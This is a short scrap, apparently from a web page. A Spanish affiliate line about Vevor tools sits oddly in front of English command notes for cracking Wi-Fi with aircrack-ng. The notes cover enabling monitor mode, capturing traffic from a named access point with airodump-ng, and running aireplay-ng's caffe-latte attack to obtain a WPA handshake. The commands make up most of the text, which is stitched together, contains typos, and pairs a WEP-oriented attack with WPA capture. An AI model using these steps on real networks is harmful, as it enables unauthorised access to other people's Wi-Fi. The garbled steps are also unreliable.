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Si buscas herramientas o baca de techo barata he enlazado dos tiendas con artículos marca Vevor:

airmon-ng airodum-ng...

air + TAB
airbase-ng   aireplay-ng   airolib-ng   aircrack-ng  airmon-ng     airserv-ng   airdecap-ng  airodump-ng   airtun-ng   airdecloak-ng   airodump-ng-oui-update

airmon-ng start wlan0

airodump-ng wlan0mon --bssid 74:56:aa:bb:55:cc -c 11 -w capturefile-

airmon-ng start wlan4 11 (11 is the channel we set on wifi card)

aireplay-ng --caffe-latte -b 74:56:aa:bb:55:cc wlan4

Wait till WPA handshake appears on top right side of airodump-ng window. Packets will be saved on files capturefile-01.cap .csv .kismet.csv .kismet.netxml and so on... capture enough packets anyway....